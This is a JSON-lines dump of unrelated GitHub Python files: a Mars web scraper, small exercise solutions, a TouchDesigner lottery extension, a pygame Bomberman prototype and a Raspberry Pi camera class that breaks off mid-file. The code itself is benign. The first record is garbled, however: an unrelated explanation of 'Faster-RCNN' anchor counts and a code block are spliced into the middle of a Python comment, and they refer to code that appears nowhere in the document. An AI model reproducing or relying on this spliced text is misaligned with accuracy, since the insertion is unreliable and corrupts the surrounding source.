+{"seq_id":"20655940875","text":"# Import Splinter, BeautifulSoup, and Pandas\nfrom splinter import Browser\nfrom bs4 import BeautifulSoup as soup\nimport pandas as pd\nfrom webdriver_manager.chrome import ChromeDriverManager\n\n# Set the executable path and initialize Splinter\nexecutable_path = {'executable_path': ChromeDriverManager().install()}\nbrowser = Browser('chrome', **executable_path, headless=False)\n\n# ### Visit the NASA Mars News Site\nurl = 'https://redplanetscience.com/'\nbrowser.visit(url)\n\n# Optional delay for loading the page\nbrowser.is_element_present_by_css('div.list_text', wait_time=1)\n\n# Convert the browser html to a soup object and then quit the browser\nhtml = browser.html\nnews_soup = soup(html, 'html.parser')\n\nslide_elem = news_soup.select_one('div.list_text')\nslide_elem.find('div', class_='content_title')\n\n# Use the parent element to find the first a tag and save it as `news_title`\nnews_title = slide_elem.find('div', class_='content_title').get_text()\nnews_title\n\n# Use 
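How `num_anchors` in the Faster-RCNN code above comes out to the 9 anchors mentioned in its comments: one anchor per (scale, ratio) pair. The config values below are typical assumptions, not read from this repository:

```python
# Assumed config values; the repo reads these from its own config object.
anchor_box_scales = [128, 256, 512]
anchor_box_ratios = [[1, 1], [1, 2], [2, 1]]
num_anchors = len(anchor_box_scales) * len(anchor_box_ratios)
print(num_anchors)  # 9 anchors per feature-map point
```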
the parent element to find the paragraph text\nnews_p = slide_elem.find('div', class_='article_teaser_body').get_text()\nnews_p\n\n# JPL Space Images Featured Image\n\n# Visit URL\nurl = 'https://spaceimages-mars.com'\nbrowser.visit(url)\n\n# Find and click the full image button\nfull_image_elem = browser.find_by_tag('button')[1]\nfull_image_elem.click()\n\n# Parse the resulting html with soup\nhtml = browser.html\nimg_soup = soup(html, 'html.parser')\nimg_soup\n\n# find the relative image url\nimg_url_rel = img_soup.find('img', class_='fancybox-image').get('src')\nimg_url_rel\n\n# Use the base url to create an absolute url\nimg_url = f'https://spaceimages-mars.com/{img_url_rel}'\nimg_url\n\n# Mars Facts\n\ndf = pd.read_html('https://galaxyfacts-mars.com')[0]\ndf.head()\n\ndf.columns=['Description', 'Mars', 'Earth']\ndf.set_index('Description', inplace=True)\ndf\n\ndf.to_html()\n\n# D1: Scrape High-Resolution Mars’ Hemisphere Images and Titles\n\n# Hemispheres\n\n# 1. Use browser to visit the URL \nurl = 'https://marshemispheres.com/'\n\nbrowser.visit(url)\n\n# 2. Create a list to hold the images and titles.\nhemisphere_image_urls = []\n\n# 3. Write code to retrieve the image urls and titles for each hemisphere.\nfor i in range(3, 7):\n # Create hemispheres dict\n hemispheres = {}\n \n # click thumbnail button to view photo\n full_image_thumb = browser.find_by_tag('img')[i]\n full_image_thumb.click()\n \n # parse the html with soup\n html = browser.html\n img_soup = soup(html, 'html.parser')\n \n # find title of image\n title = img_soup.find(class_='title').get_text()\n \n # find href for image url\n downloads = img_soup.find_all('div', class_='downloads')\n for d in downloads:\n ul = d.find('ul')\n link = ul.find_all('a')[0]\n #link = li.find('a')\n href = link['href']\n img_url = 'https://marshemispheres.com/'+href\n # print to verify results\n print(title)\n print(img_url)\n \n # add title and url to dict\n hemispheres = {'img_url': img_url,\n 'title': title}\n \n # append dict to list\n hemisphere_image_urls.append(hemispheres)\n \n # click the back button to return to main page\n browser.back()\n\n# 4. Print the list that holds the dictionary of each image url and title.\nhemisphere_image_urls\n\n# 5. 
Quit the browser\nbrowser.quit()","repo_name":"bweirich/Mission_to_Mars","sub_path":"Mission_to_Mars_Challenge.py","file_name":"Mission_to_Mars_Challenge.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"2351983909","text":"print('Class performance')\n\n# There are N students in the class.\n# Each of them received a computer science grade of 3, 4 or 5; there were no 2s today.\n#\n# The program receives a list of grades - N numbers - and prints a message saying\n# who is in the majority today: A students, B students or C students.\n\npeoples = int(input('Students in the class: '))\n\ngrade_C = 0\ngrade_B = 0\ngrade_A = 0\n\nfor i in range(peoples):\n    grade = int(input('Grade: '))\n    if grade == 3:\n        grade_C += 1\n    elif grade == 4:\n        grade_B += 1\n    else:\n        grade_A += 1\n\nif (grade_A > grade_B) and (grade_A > grade_C):\n    above = 'A students'\nelif (grade_A == grade_B) and (grade_A > grade_C):\n    above = 'A and B students'\nelif (grade_A > grade_B) and (grade_A == grade_C):\n    above = 'A and C students'\nelif (grade_B > grade_C):\n    above = 'B students'\nelif (grade_B == grade_C):\n    above = 'B and C students'\nelse:\n    above = 'C students'\n\nprint('Today there are more', above)\n","repo_name":"Vira1607/grade_school","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"29232976216","text":"import string\n\ndef isAnagram(a: str, b: str):\n    for ch in string.ascii_lowercase:\n        if a.count(ch) != b.count(ch):\n            return False\n    return True\n\nfor _ in range(int(input())):\n    a, b = input().split()\n    if isAnagram(a, b):\n        print(f'{a} & {b} are anagrams.')\n    else:\n        print(f'{a} & {b} are NOT anagrams.')\n","repo_name":"codingNoob12/algorithm-study","sub_path":"BOJ/bronze1/2022-12-16/6996.py","file_name":"6996.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"18244673378","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nfrom typing import List\n\n# https://leetcode.com/problems/minimum-domino-rotations-for-equal-row/\n\n# Time complexity: O()\n# Space complexity: O()\n\n# Observation: since we can only swap top and bottom, the value that could fill a whole row must be either A[0] or B[0]; otherwise return -1\n\n\nclass Solution:\n    # If a solution exists, then (count of the target in A) + (count in B) - (positions where A and B both show it) == N\n    def minDominoRotations(self, A: List[int], B: List[int]) -> int:\n        n = len(A)\n        for i in range(1, 7):\n            if all(i in p for p in zip(A, B)):\n                return n - max(A.count(i), B.count(i))\n        return -1\n\n    def minDominoRotations(self, A: List[int], B: List[int]) -> int:\n        n = len(A)\n\n        # check whether A and B can all become A[0]; a and b count the swaps needed\n        i = 0\n        a = b = 0\n        # a -> B to A\n        # b -> A to B\n        while i < n and (A[i] == A[0] or B[i] == A[0]):\n            if A[i] != A[0]: a += 1\n            if B[i] != A[0]: b += 1\n            if i == n - 1: return min(a, b)\n            i += 1\n\n        # check whether A and B can all become B[0]; a and b count the swaps needed\n        i = 0\n        a = b = 0\n        # a -> B to A\n        # b -> A to B\n        while i < n and (A[i] == B[0] or B[i] == B[0]):\n            if A[i] != B[0]: a += 1\n            if B[i] != B[0]: b += 1\n            if i == n - 1: return min(a, b)\n            i += 1\n\n        return -1\n","repo_name":"zihuaweng/leetcode-solutions","sub_path":"leetcode_python/1007.Minimum_Domino_Rotations_For_Equal_Row.py","file_name":"1007.Minimum_Domino_Rotations_For_Equal_Row.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"}
{"seq_id":"10052318643","text":"import TDFunctions as 
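For reference, the zip/count variant of minDominoRotations above can be exercised standalone; the sample values below are the LeetCode example, not something from the repo:

def min_domino_rotations(A, B):
    n = len(A)
    for i in range(1, 7):
        # i must appear on every domino (top or bottom) to be able to fill a whole row
        if all(i in pair for pair in zip(A, B)):
            return n - max(A.count(i), B.count(i))
    return -1

# 2 appears on every domino; A already shows it 4 times out of 6 -> 2 rotations.
print(min_domino_rotations([2, 1, 2, 4, 2, 2], [5, 2, 6, 2, 3, 2]))  # 2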
TDF\nimport webbrowser\nimport datetime\nimport time\n\nclass LotteryExt:\n\t\"\"\"\n\tLotteryExt drives a global component for quickly adding entrants to a\n\tlottery pool and selecting a random winner by rotating through the entrants\n\twheel of fortune style.\n\t\"\"\"\n\tdef __init__(self, ownerComp):\n\t\t# The component to which this extension is attached\n\t\tself.ownerComp = ownerComp\n\n\t@property\n\tdef Table(self):\n\t\ttable = self.ownerComp.op('table_lottery')\n\t\treturn table\n\n#\tpublic methods\n\tdef Addentrant(self, user=None):\n\t\t'''\n\t\tspecify a user and add a time stamped entry to the table. \n\t\tif no user is specified, add entry from ownerComp customPar['Entrantname']\n\t\t'''\n\t\ttable = self.Table\n\t\tif not user:\n\t\t\tuser = self.ownerComp.par.Entrantname.eval()\n\t\tepoch = time.time()\n\t\ttimeStamp = datetime.datetime.fromtimestamp(epoch).strftime('%Y_%m_%d_%H_%M_%S')\n\t\ttable.appendRow([user, timeStamp])\n\t\tself.ownerComp.par.Entrantname = ''\n\n\tdef Selectwinner(self, length : float=None):\n\t\t'''\n\t\ttrigger for winner selection process. if no length is specified,\n\t\tget length from ownerComp customPar['Selectionlength']\n\t\t'''\n\t\trandNum = tdu.remap(tdu.rand(absTime.frame),0, 1, 0, self.Table.numRows-2)\n\t\tself.ownerComp.op('speed1').par.resetvalue = randNum\n\t\tself.ownerComp.op('speed1').par.resetpulse.pulse()\n\t\tself.ownerComp.op('count1').par.resetvalue = int(randNum)\n\t\tself.ownerComp.op('count1').par.resetpulse.pulse()\n\t\tself.ownerComp.op('trigger1').par.triggerpulse.pulse()\n\t\top('audiofilein1').par.play = 1\n\t\t\n\n\tdef Cleartable(self):\n\t\t'''remove all entrants from the table'''\n\t\tself.Table.clear(keepFirstRow=True)\n\n\n\tdef Exporttable(self):\n\t\t'''timestamped method for export on exit'''\n\t\tfolder = self.ownerComp.par.Tablefolder.eval()\n\t\tepoch = time.time()\n\t\ttimeStamp = datetime.datetime.fromtimestamp(epoch).strftime('%Y_%m_%d')\n\t\tfileName = f'{folder}/table_lotto_{timeStamp}.py'\n\t\tself.Table.save(fileName)\n\n\tdef Exporttableas(self, fileName=None):\n\t\t'''save table as method for exporting lotto entrants'''\n\t\tfolder = self.ownerComp.par.Tablefolder.eval()\n\t\tif not fileName:\n\t\t\tfileName = ui.chooseFile(load=False, start=folder, \n\t\t\t\t\t\t\t\tfileTypes=['py'], title='Save table as:')\n\t\tif fileName:\n\t\t\tself.Table.save(fileName)\n\t\t\tprint(f'{self.Table} successfully saved as {fileName}')\n\n\tdef Importtable(self):\n\t\t'''method for importing an externalized lotto table'''\n\t\tfolder = self.ownerComp.par.Tablefolder.eval()\n\t\tfileName = ui.chooseFile(load=True, start=folder, \n\t\t\t\t\t\t\t\tfileTypes=['py'], title='Load table:')\n\t\timportProxy = self.ownerComp.op('importProxy')\n\t\tif fileName != None:\n\t\t\tui.undo.startBlock(f'undo {self.Table} import from {fileName}')\n\t\t\timportProxy.clear()\n\t\t\timportProxy.par.file = fileName\n\t\t\timportProxy.par.loadonstartpulse.pulse()\n\t\t\tself.Table.copy(importProxy)\n\t\t\tui.undo.endBlock()\n\t\t\tdebug(f'{self.Table} successfully imported from {fileName}')\n\n# support methods\n\n\tdef Readme(self):\n\t\t\"\"\"Pulse to open a floating Readme document\"\"\"\n\t\tself.ownerComp.op('readme').openViewer()\n\t\tdebug('readme')\n\n\tdef Support(self):\n\t\t'''partronize the creator'''\n\t\turl = self.ownerComp.par.Supporturl.eval()\n\t\twebbrowser.open(url)\n\n\tdef Git(self):\n\t\t'''navigate browser to git repo'''\n\t\twebbrowser.open(self.ownerComp.par.Github.val)\n\n# region callbacks\n\n# 
parexec_passThru callbacks\n\tdef onParValueChange(self, par, prev):\n\t\t\"\"\"parexec_passThru value change callbacks to condense logic to ext\"\"\"\n\t\tif par.name == 'Test':\n\t\t\tdebug('Test')\n\n\tdef onParPulse(self, par):\n\t\t\"\"\"parexec_passThru pulse callbacks to condense logic to ext\"\"\"\n\t\townerComp = self.ownerComp\n\t\tif par.name == 'Help':\n\t\t\tprint(help(self))\n\t\t\tui.messageBox('Help', 'help printed to textport', buttons=['ok'])\n\t\telse: \n\t\t\ttry:\n\t\t\t\tgetattr(ownerComp, par.name)()\n\t\t\texcept Exception as e:\n\t\t\t\tdebug(e)\n\n\n# end region","repo_name":"drmbt/DRMBT-TD_shared","sub_path":"Lottery/lib/modules/LotteryExt.py","file_name":"LotteryExt.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"}
{"seq_id":"36400758286","text":"import sys\nfrom collections import deque, defaultdict\ninput = sys.stdin.readline\n\nN = int(input())\n\nmp, mf, ms, mv = map(int, input().split())\n\ntable = []\nret = sys.maxsize\nretd = defaultdict(list)\n\nfor i in range(N):\n    p, f, s, v, c = map(int, input().split())\n\n    table.append({\n        \"p\": p,\n        \"f\": f,\n        \"s\": s,\n        \"v\": v,\n        \"c\": c\n    })\n\nfor i in range(1 << N):\n    p = f = s = v = sum = 0\n    tv = []\n    for j in range(N):\n        if i & (1 << j):\n            tv.append(j + 1)\n            curr = table[j]\n            p += curr[\"p\"]\n            f += curr[\"f\"]\n            s += curr[\"s\"]\n            v += curr[\"v\"]\n            sum += curr[\"c\"]\n    if p >= mp and f >= mf and s >= ms and v >= mv:\n        if ret >= sum:\n            ret = sum\n            retd[ret].append(tv)\n\nif ret == sys.maxsize:\n    print(-1)\nelse:\n    print(ret)\n    retd[ret].sort()\n    for item in retd[ret][0]:\n        print(item, end=\" \")\n","repo_name":"jhpung/PS","sub_path":"문제풀이/백준/비트마스킹/19942.py","file_name":"19942.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"72134108624","text":"import pygame\nimport pytmx\n\n# global variables\nWIDTH_SCREEN, HEIGHT_SCREEN = 272, 208\nPLAYER_SIZE = 16\nTILE_SIZE = 16\nPOSITION_PLAYER_X, POSITION_PLAYER_Y = 2, 1\nGAME_SCALE = 3\nFREE_TILE = 0\nNONE_TILE = 0\nPLAYER_SPEED = PLAYER_SIZE\nWHITE = (0, 0, 0)\nPATH_STAGE1_MAP = \"TiledMap/Stage1/Stage1.tmx\"\nPATH_PLAYER_SPRITE= \"Sprites/bomberman_main.png\"\nPATH_BLOCK_SPRITE= \"Sprites/block_town.png\"\nPATH_BOMB_SPRITE= \"Sprites/bomb.png\"\nPATH_EXPLOTION_SPRITE= \"Sprites/explotion.png\"\nPATH_TILE_SPRITE= \"Sprites/stage1_tile.png\"\nEXPLOSION_RADIUS = 1\nEXPLOSION_TIME = 18\nCLOCK_TIME = 8\n\nclass Player:\n    def __init__(self, x, y, size, speed, sprite, game_scale, tile_size):\n        self.posX = x * tile_size\n        self.posY = y * tile_size\n        self.size = size\n        self.speed = speed\n        self.scaled_player_sprite = self.load_sprites(sprite, game_scale, size)\n\n    def load_sprites(self, sprite_name, game_scale, size):\n        sprite = pygame.image.load(sprite_name)\n        # Scale the image to the player size\n        scaled_player_sprite = pygame.transform.scale(sprite, (game_scale * size, size * game_scale))\n        return scaled_player_sprite\n\n    def move(self, movement_x, movement_y):\n        self.posX += movement_x #offset_x\n        self.posY += movement_y \n\n    def draw(self, game_window, scale_game):\n        scaled_size = int(self.size * scale_game)\n        scaled_player_rect = pygame.Rect(self.posX * scale_game, self.posY * scale_game, scaled_size, scaled_size)\n        # Draw the sprite on screen\n        game_window.blit(self.scaled_player_sprite, scaled_player_rect)\n\n\nclass Destructible_Tile:\n    collision_block 
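The 19942.py record above enumerates every ingredient subset with a bitmask. The same `1 << N` / `mask & (1 << j)` pattern as a small generic helper:

def subsets(items):
    n = len(items)
    for mask in range(1 << n):
        # bit j of mask decides whether items[j] is in this subset
        yield [items[j] for j in range(n) if mask & (1 << j)]

print(list(subsets(['a', 'b', 'c'])))  # 8 subsets, from [] to ['a', 'b', 'c']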
= None\n    def __init__(self, x, y, size, sprite, game_scale, tile_size):\n        self.posX = x * tile_size\n        self.posY = y * tile_size\n        self.size = size\n        self.animation_destructible_tile = Animation(sprite, 4, CLOCK_TIME, game_scale)\n\n    def draw(self, game_window, scale_game):\n        scaled_size = int(self.size * scale_game)\n        game_window.blit(self.animation_destructible_tile.get_current_frame(), (self.posX * scale_game, self.posY * scale_game))\n        self.collision_block = pygame.Rect(self.posX * scale_game, self.posY * scale_game, scaled_size, scaled_size)\n\n\n    \nclass Bomb:\n    def __init__(self, x, y, size, sprite_bomb, sprite_explotion, game_scale, explosion_radius, explosion_time, game_map):\n        self.posX = x\n        self.posY = y\n        self.size = size\n        self.game_scale = game_scale\n        self.explotion_radius = explosion_radius\n        self.explotion_time = explosion_time\n        self.exploded = False\n        self.destroy_tiles_in_radius(game_map, self.posX, self.posY, explosion_radius)\n        \n        # animation\n        self.animation_Bomb = Animation(sprite_bomb, 3, CLOCK_TIME, game_scale)\n        self.animation_Explotion = Animation(sprite_explotion, 2, CLOCK_TIME, game_scale)\n\n\n    def draw(self, game_window, scale_game):\n        game_window.blit(self.animation_Bomb.get_current_frame(), (self.posX * scale_game, self.posY * scale_game))\n\n\n    def explotion_countdown(self, game_window):\n        if not self.exploded:\n            self.explotion_time -= 1\n            if self.explotion_time <= 0:\n                self.exploded = True\n                game_window.blit(self.animation_Explotion.get_current_frame(), ((self.posX-32) * self.game_scale, (self.posY-32) * self.game_scale))\n\n    def destroy_tiles_in_radius(self, map_wall, bomb_posX, bomb_posY, explosion_radius):\n        bomb_posX = int(bomb_posX/self.size)\n        bomb_posY = int(bomb_posY/self.size)\n        # Destroy along the horizontal row to the left\n        for offset_x in range(1, explosion_radius + 1):\n            tile_x = bomb_posX - offset_x\n            if 0 <= tile_x < len(map_wall[0]):\n                if map_wall[bomb_posY][tile_x] == NONE_TILE:\n                    print(\"animate <-\")\n                    print(map_wall[bomb_posY][tile_x])\n                else:\n                    break\n        # Destroy along the horizontal row to the right\n        for offset_x in range(1, explosion_radius + 1):\n            #tile_x = int(bomb_posX/self.size) + offset_x\n            tile_x = bomb_posX + offset_x\n            if 0 <= tile_x < len(map_wall[0]):\n                if map_wall[bomb_posY][tile_x] == NONE_TILE:\n                    print(\"animate ->\")\n                    print(map_wall[bomb_posY][tile_x])\n                else:\n                    break\n        \n        # Destroy along the vertical column upwards\n        for offset_y in range(1, explosion_radius + 1):\n            tile_y = bomb_posY - offset_y\n            if 0 <= tile_y < len(map_wall):\n                if map_wall[tile_y][bomb_posX] == NONE_TILE:\n                    print(\"animate up\") \n                    print(map_wall[tile_y][bomb_posX])\n                else:\n                    break\n        \n        # Destroy along the vertical column downwards\n        for offset_y in range(1, explosion_radius+1):\n            tile_y = bomb_posY + offset_y\n            if 0 <= tile_y < len(map_wall):\n                if map_wall[tile_y][bomb_posX] == NONE_TILE:\n                    print(\"animate down\")\n                    print(map_wall[tile_y][bomb_posX])\n                else:\n                    break\n        \n    def check_for_enemy_hits(self):\n        print(\"in progress\")\n\n    def check_for_bomberman_hit(self):\n        print(\"in progress\")\n\nclass Animation:\n    def __init__(self, sprite_name, num_frames, speed, game_scale):\n        self.animation_speed = speed\n        self.frame_index = 0\n        self.num_frames = num_frames\n        self.frames = self.load_sprites(sprite_name, num_frames, game_scale)\n        self.game_scale = game_scale\n\n    def load_sprites(self, sprite_name, num_frames, game_scale):\n        sprite_sheet = pygame.image.load(sprite_name)\n        sprite_sheet = pygame.transform.scale(sprite_sheet, (game_scale* 
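A toy restatement of the four-direction blast scan in destroy_tiles_in_radius above, in pure Python: 0 marks a free tile, anything else blocks the blast in that direction.

def blast_cells(grid, row, col, radius):
    hit = []
    for dr, dc in [(-1, 0), (1, 0), (0, -1), (0, 1)]:   # up, down, left, right
        for step in range(1, radius + 1):
            r, c = row + dr * step, col + dc * step
            if not (0 <= r < len(grid) and 0 <= c < len(grid[0])):
                break
            if grid[r][c] != 0:
                break   # a wall stops the blast in this direction
            hit.append((r, c))
    return hit

grid = [[0, 0, 0], [0, 0, 1], [0, 0, 0]]
print(blast_cells(grid, 1, 1, 1))  # [(0, 1), (2, 1), (1, 0)]; the wall at (1, 2) blocks right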
sprite_sheet.get_width(), sprite_sheet.get_height() * game_scale))\n        frame_width = sprite_sheet.get_width() // num_frames\n        frame_height = sprite_sheet.get_height()\n        #sprite_list = [sprite_sheet.subsurface(pygame.Rect(i * frame_width, 0, frame_width, frame_height)) for i in range(num_frames)]\n        sprite_list = []\n        for i in range(num_frames):\n            frame_rect = pygame.Rect(i * frame_width , 0, frame_width, frame_height)\n            frame_image = sprite_sheet.subsurface(frame_rect)\n            sprite_list.append(frame_image)\n        return sprite_list\n\n    def get_current_frame(self):\n        self.frame_index = (self.frame_index + 1) % self.num_frames\n        return self.frames[self.frame_index]\n    \n\n\nclass GameEngine:\n    map_game = None\n    def __init__(self, width, height, GAME_SCALE, player_size, player_speed):\n        pygame.init()\n        self.running = True\n        self.screen = pygame.display.set_mode((width * GAME_SCALE, height * GAME_SCALE))\n        # Get the map layers\n        self.tmx_map = pytmx.load_pygame(PATH_STAGE1_MAP)\n        self.terrain_layer = self.tmx_map.get_layer_by_name(\"Terrain\")\n        self.wall_layer = self.tmx_map.get_layer_by_name(\"Wall\")\n        self.block_layer = self.tmx_map.get_layer_by_name(\"Block\")\n        self.tile_width = self.tmx_map.tilewidth \n        self.tile_height = self.tmx_map.tileheight\n\n        # object instances \n        self.player = Player(POSITION_PLAYER_X, POSITION_PLAYER_Y, player_size, player_speed, PATH_PLAYER_SPRITE, GAME_SCALE, self.tile_width)\n        self.game_scale = GAME_SCALE\n        # List to store Destructible_Tile instances\n        self.destructible_tile = []\n        self.append_destructible_tile_matrix(self.block_layer)\n        self.bombs = []\n\n        self.merge_matrix(self.wall_layer.data, self.block_layer.data)\n\n    def append_destructible_tile_matrix(self, layer):\n        for row in range(len(layer.data)):\n            for Column in range(len(layer.data[row])):\n                ID_tile = layer.data[row][Column]\n                if ID_tile != NONE_TILE:\n                    block_size = self.tile_width # Adjust the size as needed\n                    block_sprite_path = PATH_TILE_SPRITE\n                    block = Destructible_Tile(Column, row, block_size, block_sprite_path, self.game_scale, self.tile_width)\n                    self.destructible_tile.append(block)\n\n\n    def can_move_to(self, futureX, futureY): \n        # Check whether position (x, y) is walkable in the Wall layer.\n        tile_x = int(futureX / self.tile_width)\n        tile_y = int(futureY / self.tile_height)\n        if len(self.wall_layer.data) > tile_y >= 0 and len(self.wall_layer.data[0]) > tile_x >= 0:\n            ID_tile = self.wall_layer.data[tile_y][tile_x]\n            if ID_tile == FREE_TILE:\n                # logic ONLY for blocks with pygame colliders\n                future_player_position = pygame.Rect(futureX * self.game_scale, futureY * self.game_scale,\n                                                     self.player.size * self.game_scale, self.player.size * self.game_scale)\n\n                for block in self.destructible_tile:\n                    if future_player_position.colliderect(block.collision_block):\n                        # There is a collision with a block, do not allow the movement\n                        return False\n                # No collision with blocks, allow the movement\n                return True\n        return False\n\n    def merge_matrix(self, matrix_wall, matrix_block):\n        rows = len(matrix_wall)\n        cols = len(matrix_wall[0])\n\n        # Initialize map_game with the values of the first matrix\n        self.map_game = [row.copy() for row in matrix_wall]\n        # Update map_game with the non-null values of the second matrix\n        for i in range(rows):\n            for j in range(cols):\n                if matrix_block[i][j] != NONE_TILE:\n                    self.map_game[i][j] = matrix_block[i][j]\n        return self.map_game\n\n    def draw_layer(self, layer):\n        for row in range(len(layer.data)):\n            for Column in 
range(len(layer.data[row])):\n                ID_tile = layer.data[row][Column]\n                if ID_tile != NONE_TILE:\n                    tile = self.tmx_map.get_tile_image_by_gid(ID_tile)\n                    scaled_tile = pygame.transform.scale(tile, (int(self.tile_width * self.game_scale),\n                                                                int(self.tile_height * self.game_scale)))\n                    self.screen.blit(scaled_tile, (Column * self.tile_width * self.game_scale,\n                                                   row * self.tile_height * self.game_scale))\n\n\n    def handle_inputs(self):\n        keys = pygame.key.get_pressed()\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                self.running = False\n\n        # Detect whether the space key is pressed\n        if keys[pygame.K_SPACE]:\n            Bomba = Bomb(self.player.posX, self.player.posY, self.player.size, PATH_BOMB_SPRITE, PATH_EXPLOTION_SPRITE, self.game_scale, EXPLOSION_RADIUS, EXPLOSION_TIME, self.map_game) \n            self.bombs.append(Bomba)\n        \n        # Move the player one tile when a key is pressed and the position is walkable \n        if keys[pygame.K_UP] and self.can_move_to(self.player.posX, self.player.posY - self.player.speed):\n            self.player.move(0, -PLAYER_SPEED)\n        elif keys[pygame.K_DOWN] and self.can_move_to(self.player.posX, self.player.posY + self.player.speed):\n            self.player.move(0, PLAYER_SPEED)\n        elif keys[pygame.K_LEFT] and self.can_move_to(self.player.posX - self.player.speed, self.player.posY):\n            self.player.move(-PLAYER_SPEED, 0)\n        elif keys[pygame.K_RIGHT] and self.can_move_to(self.player.posX + self.player.speed, self.player.posY):\n            self.player.move(PLAYER_SPEED, 0)\n\n    def update(self, clock):\n        active_bombs = [] # Create a new list to store the active bombs\n        for bomb in self.bombs:\n            if bomb.explotion_time > 0:\n                active_bombs.append(bomb)\n        self.bombs = active_bombs\n        \n        pygame.display.flip() # Update the screen\n\n        #pygame.time.delay(200) # Add a small delay to control the player speed\n        clock.tick(CLOCK_TIME) # Control the speed of the main loop / FPS\n\n    def draw(self):\n        self.screen.fill(WHITE) # Clear the screen \n        \n\n        self.draw_layer(self.terrain_layer)\n\n        for bomb in self.bombs:\n            bomb.explotion_countdown(self.screen)\n\n        self.draw_layer(self.wall_layer)\n\n        # Draw bombs\n        for bomb in self.bombs:\n            bomb.draw(self.screen, self.game_scale)\n\n        # Draw the player\n        self.player.draw(self.screen, self.game_scale)\n\n        # Draw blocks\n        for block in self.destructible_tile:\n            block.draw(self.screen, self.game_scale)\n\n\n    \n\n    def run(self):\n        clock = pygame.time.Clock()\n        while self.running: # Main loop\n            self.handle_inputs()\n            self.draw()\n            self.update(clock)\n        pygame.quit()\n\n    \ngame_engine = GameEngine(WIDTH_SCREEN , HEIGHT_SCREEN, GAME_SCALE, PLAYER_SIZE, PLAYER_SPEED)\ngame_engine.run()\n\n\n\n\n","repo_name":"unAbel/pygame_game","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":13438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"2735776965","text":"# https://bitbucket.org/hrojas/learn-pandas\n\nimport pandas as pd\n\n#01\nnames = ['Bob','Jessica','Mary','John','Mel']\nbirths = [968, 155, 77, 578, 973]\nBabyDataSet = list(zip(names,births))\n\ndf = pd.DataFrame(data = BabyDataSet, columns=['Names', 'Births'])\n\n","repo_name":"JohnWSteill/EdProjs","sub_path":"PyEdProjs/Pandas/Rojas.py","file_name":"Rojas.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"13639791350","text":"\"\"\"\nCreated on Thu Mar 12 
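The merge_matrix overlay from GameEngine, restated on two tiny layers: non-zero block tiles override the wall layer, zeros leave it unchanged.

def merge(wall, block, none_tile=0):
    merged = [row.copy() for row in wall]
    for i in range(len(wall)):
        for j in range(len(wall[0])):
            if block[i][j] != none_tile:
                merged[i][j] = block[i][j]
    return merged

wall = [[1, 0], [0, 1]]
block = [[0, 7], [0, 0]]
print(merge(wall, block))  # [[1, 7], [0, 1]]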
15:03 2020\n\nThis script contains the class that is in charge of controlling\neverything related to the visual camera. \n\nActions to be performed with the camera:\n    1) Connect to the camera on the correct serial port (it may change)\n    2) Set the camera settings \n    3) Take images and store them to be readable by the main program\n    4) Save those images on the correct path \n    5) GPS coordinates are tagged directly on the image, not in the json file\n    6) Write all the image paths and names to the json file\n\nTo do so, we will work with the pygame library for controlling the camera, \nas well as with numpy and cv2 (the same as the other programs contained in this project)\n\"\"\"\n\nimport os\nimport json\nimport pygame\nimport pygame.camera\nfrom pygame.locals import *\nimport numpy as np\nimport cv2\n\n\nclass VisualCameraInterface():\n\n    def __init__(self, timestamp, path_visualimages):\n\n        # visual camera settings\n        self.port = \"/dev/video0\"\n        self.resolution = (640, 480)\n        self.cam = pygame.camera.Camera(self.port, self.resolution)\n        self.cam.start()\n        \n        # variables we need to introduce from the main script\n        self.timestamp = timestamp\n        self.path = path_visualimages\n\n        # We initialize the array containing the data of the images\n        self.visualimages = []\n\n\n    def take_image(self):  # function to take an image with the visual camera\n\n        # cv2.imread expects a file path, so it cannot read the pygame Surface directly;\n        # convert the Surface into a numpy array that OpenCV can work with instead\n        surface = self.cam.get_image()\n        img = np.transpose(pygame.surfarray.array3d(surface), (1, 0, 2))\n        img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n        return img\n\n\n    def edit_json(self, newvisualimage):\n        # we try to write an existing json. If not existing, we create a new one\n        try:\n            with open('/home/pi/Desktop/HF-LOCUST-WASP/visual_images.json', 'r+') as f:\n                data = []\n                try:\n                    data = json.load(f)\n                except:\n                    print(\"Empty json r+\")\n\n                data.append(newvisualimage)\n                f.seek(0)\n                json.dump(data, f)\n                f.truncate()\n                f.close()\n\n        except:\n            with open('/home/pi/Desktop/HF-LOCUST-WASP/visual_images.json', 'w') as f:\n                data = []\n                try:\n                    data = json.load(f)\n                except:\n                    print(\"Empty json x\")\n\n                data.append(newvisualimage)\n                f.seek(0)\n                json.dump(data, f)\n                f.truncate()\n                f.close()\n\n        print(\"done\")\n\n\n    def write_json(self, num_visual, path_visual):\n        \n        self.visualimages.append(\n            {\n                \"image_id\": num_visual,\n                \"image_path\": path_visual,\n            }\n        )\n\n        locust_images = {\n            \"id\": self.timestamp,\n            \"results\": self.visualimages\n        }\n\n        return locust_images\n\n    def tag_image(self, img, coordinates):\n        # The main purpose of this function is to tag the image with the GPS coordinates over a white background\n\n        # we will draw a white rectangle as background \n        rectangle_bgr = (255, 255, 255)\n\n        text = str(coordinates)\n\n        # set the text start position\n        text_offset_x = 50\n        text_offset_y = img.shape[0] - 25\n\n        font = cv2.FONT_HERSHEY_SIMPLEX\n        # org\n        org = (50, 50)\n        # fontScale\n        fontScale = 0.8\n\n        # Black color in BGR\n        color = (0, 0, 